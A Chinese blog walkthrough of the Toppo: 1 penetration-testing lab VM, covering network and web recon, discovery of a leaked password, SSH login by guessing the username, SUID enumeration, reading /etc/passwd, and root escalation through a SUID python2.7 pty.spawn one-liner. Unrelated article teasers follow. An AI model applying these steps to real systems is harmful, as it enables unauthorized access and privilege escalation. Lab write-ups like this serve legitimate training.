红队渗透靶机:TOPPO: 1

news2024/11/15 2:00:51

目录

信息收集

1、arp

2、nmap

3、nikto

4、whatweb

5、dirsearch

WEB

tips1

tips2

SSH登录

提权

系统信息收集

本地

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.110.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.110.1   00:50:56:c0:00:08       VMware, Inc.
192.168.110.2   00:50:56:ec:d1:ca       VMware, Inc.
192.168.110.139 00:50:56:29:c8:d6       VMware, Inc.
192.168.110.254 00:50:56:eb:0a:02       VMware, Inc.

7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.403 seconds (106.53 hosts/sec). 4 responded

2、nmap
端口信息收集

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.110.139 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 13:09 CST
Nmap scan report for 192.168.110.139
Host is up (0.0030s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
48855/tcp open  unknown
MAC Address: 00:50:56:29:C8:D6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds


版本信息收集

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -O -A -p 22,80,111,48855 192.168.110.139 --min-rat 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 13:10 CST
Nmap scan report for 192.168.110.139
Host is up (0.00042s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|   256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Clean Blog - Start Bootstrap Theme
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          39743/udp6  status
|   100024  1          48855/tcp   status
|   100024  1          52889/udp   status
|_  100024  1          56308/tcp6  status
48855/tcp open  status  1 (RPC #100024)
MAC Address: 00:50:56:29:C8:D6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.110.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds


3、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.110.139
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.110.139
+ Target Hostname:    192.168.110.139
+ Target Port:        80
+ Start Time:         2024-01-19 13:11:21 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 1925, size: 563f5cf714e80, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /admin/: Directory indexing found.
+ /admin/: This might be interesting.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /img/: Directory indexing found.
+ /img/: This might be interesting.
+ /mail/: Directory indexing found.
+ /mail/: This might be interesting.
+ /manual/: Web server manual found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /package.json: Node.js package file found. It may contain sensitive information.
+ /README.md: Readme Found.
+ 8102 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2024-01-19 13:11:39 (GMT8) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.110.139
WhatWeb report for http://192.168.110.139
Status    : 200 OK
Title     : Clean Blog - Start Bootstrap Theme
IP        : 192.168.110.139
Country   : RESERVED, ZZ

Summary   : Apache[2.4.10], Bootstrap, HTML5, HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], JQuery, Script

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.10 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with
        HTML, CSS, and JS.

        Website     : https://getbootstrap.com/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.10 (Debian) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse
        HTML documents, handle events, perform animations, and add
        AJAX.

        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.


HTTP Headers:
        HTTP/1.1 200 OK
        Date: Fri, 19 Jan 2024 13:10:27 GMT
        Server: Apache/2.4.10 (Debian)
        Last-Modified: Tue, 30 Jan 2018 03:18:02 GMT
        ETag: "1925-563f5cf714e80-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 1640
        Connection: close
        Content-Type: text/html

5、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.110.139 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.110.139/_24-01-19_13-12-20.txt

Target: http://192.168.110.139/

[13:12:20] Starting:
[13:12:22] 301 -  315B  - /js  ->  http://192.168.110.139/js/
[13:12:25] 200 -    1KB - /about.html
[13:12:27] 200 -  455B  - /admin/
[13:12:28] 301 -  318B  - /admin  ->  http://192.168.110.139/admin/
[13:12:38] 200 -    2KB - /contact.html
[13:12:38] 301 -  316B  - /css  ->  http://192.168.110.139/css/
[13:12:43] 200 -  947B  - /gulpfile.js
[13:12:44] 301 -  316B  - /img  ->  http://192.168.110.139/img/
[13:12:45] 200 -  549B  - /js/
[13:12:46] 200 -    1KB - /LICENSE
[13:12:47] 301 -  317B  - /mail  ->  http://192.168.110.139/mail/
[13:12:47] 200 -  459B  - /mail/
[13:12:47] 200 -  201B  - /manual/index.html
[13:12:47] 301 -  319B  - /manual  ->  http://192.168.110.139/manual/
[13:12:51] 200 -    1KB - /package.json
[13:12:51] 200 -  256KB - /package-lock.json
[13:12:53] 200 -    3KB - /post.html
[13:12:54] 200 -    4KB - /README.md
[13:13:03] 200 -  479B  - /vendor/

Task Completed

WEB


tips1


发现密码:12345ted123
tips2


由于只知道密码,不知道账号!我们尝试爆破,但是经过尝试,失败了!

12345ted123    尝试ted ???


SSH登录


猜对了!

提权

系统信息收集
ted@Toppo:/home$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount

ted@Toppo:/home$ uname -a
Linux Toppo 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux

ted@Toppo:/home$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 8.10 (jessie)
Release:        8.10
Codename:       jessie

ted@Toppo:/home$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
ted@Toppo:/home$


ted@Toppo:/home$ ls -al /etc/passwd /etc/shadow
-rw-r--r-- 1 root root   1512 Apr 15  2018 /etc/passwd
-rw-r----- 1 root shadow  998 Apr 15  2018 /etc/shadow

ted@Toppo:/home$ cat /etc/passwd | grep "/home" | grep -v nologin
ted:x:1000:1000:Ted,,,:/home/ted:/bin/bash


这个py是可读可写可执行的权限的!

本地
ted@Toppo:/var/www/html/vendor$ python2.7 -c 'import pty;pty.spawn("/bin/bash")'
bash-4.3$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

bash-4.3$ python2.7 -c 'import pty;pty.spawn("/bin/sh")'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# cd /root
# ls -al
total 24
drwx------  2 root root 4096 Apr 15  2018 .
drwxr-xr-x 21 root root 4096 Apr 15  2018 ..
-rw-------  1 root root   53 Apr 15  2018 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  397 Apr 15  2018 flag.txt
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
# cat flag.txt
_________
|  _   _  |
|_/ | | \_|.--.   _ .--.   _ .--.    .--.
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
   _| |_ | \__. | | \__/ | | \__/ || \__. |
  |_____| '.__.'  | ;.__/  | ;.__/  '.__.'
                 [__|     [__|




Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1398477.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

采集B站up主视频信息

一、网页信息(示例网址:https://space.bilibili.com/3493110839511225/video)

基于SSM的KTV包厢管理系统(有报告)。Javaee项目,ssm项目。

演示视频: 基于SSM的KTV包厢管理系统(有报告)。Javaee项目,ssm项目。 项目介绍: 采用M(model)V(view)C(controller)三层体系结构,通过…

【极光系列】springBoot集成elasticsearch

【极光系列】springBoot集成elasticsearch 一.gitee地址 直接下载解压可用 https://gitee.com/shawsongyue/aurora.git 模块:aurora_elasticsearch 二.windows安装elasticsearch tips:注意es客户端版本要与java依赖版本一致,目前使用7.6…

掌握大模型这些优化技术,优雅地进行大模型的训练和推理!

ChatGPT于2022年12月初发布,震惊轰动了全世界,发布后的这段时间里,一系列国内外的大模型训练开源项目接踵而至,例如Alpaca、BOOLM、LLaMA、ChatGLM、DeepSpeedChat、ColossalChat等。不论是学术界还是工业界,都有训练大…

5分钟教会你如何在生产环境debug代码

前言 有时出现的线上bug在测试环境死活都不能复现,靠review代码猜测bug出现的原因,然后盲改代码直接在线上测试明显不靠谱。这时我们就需要在生产环境中debug代码,快速找到bug的原因,然后将锅丢出去。 生产环境的代码一般都是关闭…

Peter算法小课堂—拓扑排序与最小生成树

拓扑排序 讲拓扑排序前,我们要先了解什么是DAG树。所谓DAG树,就是指“有向无环图”。请判断下列图是否是DAG图 第一幅图,它不是DAG图,因为它形成了一个环。第二幅图,它也不是DAG图,因为它没有方向。第三幅…

Red Hat Enterprise Linux 6.10 安装图解

引导和开始安装 选择倒计时结束前,通过键盘上下键选择下图框选项,启动图形化安装过程。需要注意的不同主板默认或者自行配置的固件类型不一致,引导界面有所不同。也就是说使用UEFI和BIOS的安装引导界面是不同的,如图所示。若手动调…

SpringBoot 服务注册IP选择问题

问题 有时候我们明明A\B服务都注册成功了,但是相互之间就是访问不了,这大概率是因为注册时选择IP时网卡选错了,当我们本地电脑有多个网卡时,程序会随机选择一个有IPV4的网卡,然后读取IPv4的地址 比如我的电脑有3个网…

mysql中的联合索引为什么要遵循最佳左前缀法则?

mysql中的联合索引为什么要遵循最佳左前缀法则? 一、什么是联合索引二、联合索引的优化1.常规的写法(回表查询)2.优化写法(索引覆盖) 三、 为什么要遵循最佳左前缀法则?1.如下查询语句可以使用到索引&#…

[C#]C# winform部署yolov8目标检测的openvino模型

【官方框架地址】 https://github.com/ultralytics/ultralytics 【openvino介绍】 OpenVINO(Open Visual Inference & Neural Network Optimization)是由Intel推出的,用于加速深度学习模型推理的工具套件。它旨在提高计算机视觉和深度学…

【LeetCode】数学精选4题

目录 1. 二进制求和(简单) 2. 两数相加(中等) 3. 两数相除(中等) 4. 字符串相乘(中等) 1. 二进制求和(简单) 从字符串的右端出发向左做加法,…

Unity3D学习之UI系统——GUI

文章目录 1. 前言2. 工作原理和主要作用3. 基础控件3.1 重要参数及文本和按钮3.1.1 GUI 共同点3.1.2 文本控件3.1.3 按钮控件 3.2 多选框和单选框3.2.1 多选框3.2.2 单选框3.2.3 输入框3.2.4 拖动条 3.3 图片绘制和框3.3.1 图片3.3.2 框绘制 4 工具栏和选择网格4.1 工具栏4.2 选…

数据分析中常用的指标或方法

一、方差与标准差二、协方差三、皮尔逊系数四、斯皮尔曼系数五、卡方检验六、四分位法和箱线图七、 一、方差与标准差 总体方差 V a r ( x ) σ 2 ∑ i 1 n ( x i − x ˉ ) 2 n ∑ i 1 n x i 2 − n x ˉ 2 n E ( x 2 ) − [ E ( x ) ] 2 Var(x)\sigma^2\frac {\sum\l…

RK3566 linux加入uvc app

一、集成应用 SDK中external/uvc_app/目录提供了将板卡模拟成uvc camera的功能。如果external目录下没有uvc_app和minilogger,可从其它sdk中拷贝。需要拷贝以下文件: external\uvc_app external\minilogger \buildroot\package\rockchip\uvc_app \buil…

MCM备赛笔记——图论模型

Key Concept 图论是数学的一个分支,专注于研究图的性质和图之间的关系。在图论中,图是由顶点(或节点)以及连接这些顶点的边(或弧)组成的。图论的模型广泛应用于计算机科学、通信网络、社会网络、生物信息学…

2024年阿里云优惠券和代金券领取,活动整理服务器价格表

2024阿里云优惠活动,免费领取阿里云优惠代金券,阿里云优惠活动大全和云服务器优惠价格表,阿里云ECS服务器优惠价99元一年起,轻量服务器优惠价61元一年,阿里云服务器网aliyunfuwuqi.com分享阿里云优惠券免费领取、优惠活…

【已解决】namespace “Ui“没有成员 xxx

先说笔者遇到的问题,我创建一个QWidget ui文件,然后编辑的七七八八后,想要用.h与.cpp调用其,编译通过,结果报了这个错误,本方法不是普适性,但是确实解决了这个鸟问题。 问题来源 搭建ui后&…

MT36291替代MT3608 FP6291 低成本 用于移动电源,蓝牙音箱,便携式设备等

航天民芯原装MT36291 SOT23-6 PIN对PIN替代FP6291LR-G1 MT3608等,低成本,用于移动电源,蓝牙音箱,便携式设备等领域。 TEL:18028786817 专注于电源管理IC 一级代理 技术支持 欢迎试样! 描述 MT36291是一个恒定频…

位运算的奇技淫巧

常见位运算总结&#xff1a; 1、基础位运算 左移<<运算 将二进制数向左移位操作&#xff0c;高位溢出则丢弃&#xff0c;低位补0。 右移>>运算 右移位运算中&#xff0c;无符号数和有符号数的运算并不相同。对于无符号数&#xff0c;右移之后高位补0&#xff…

软件测试|Python字典的访问方式你了解吗?

简介 Python中的字典&#xff08;dictionary&#xff09;是一种非常有用的数据结构&#xff0c;它允许您存储键-值对&#xff0c;从而可以快速查找、插入和删除数据。本文将详细介绍如何访问字典中的数据&#xff0c;包括基本访问、循环遍历、使用内置方法以及处理不存在的键等…